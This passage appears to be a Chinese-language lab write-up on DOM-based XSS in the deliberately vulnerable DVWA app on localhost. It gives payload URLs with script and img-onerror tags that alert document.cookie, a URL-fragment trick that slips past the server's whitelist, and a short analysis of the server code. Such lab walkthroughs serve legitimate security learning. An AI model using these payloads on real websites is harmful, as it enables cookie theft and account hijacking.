随便选择一个。url中会出现我们选的哪个

http://127.0.0.1/DVWA-master/vulnerabilities/xss_d/?default=%3Cscript%3Ealert(document.cookie)%3C/script%3E

应该与medium级别一样,过滤了script标签
试试 <img src=1 onerror=alert(document.cookie)>
http://127.0.0.1/DVWA-master/vulnerabilities/xss_d/?default=%3Cimg%20src=1%20onerror=alert(document.cookie)%3E
再换一种方法
URL的锚(#符号之后的任何内容)不会发送到服务器,因此无法被阻止
http://127.0.0.1/DVWA-master/vulnerabilities/xss_d/?default=English#%3Cscript%3Ealert(document.cookie)%3C/script%3E

成功执行
代码分析

可以看出,服务器端代码先判断defalut值是否为空,如果不为空的话,再用switch语句进行匹配,如果匹配成功,则插入case字段的相应值,如果不匹配,则插入的是默认的值。白名单只允许传的 default值 为 French English German Spanish 其中一个。
本文深入探讨了跨站脚本(XSS)攻击的各种技巧,包括如何绕过不同级别的过滤机制,利用URL锚点进行攻击,以及对服务器端代码的详细分析。通过具体的案例,展示了如何构造payload触发XSS漏洞。
618





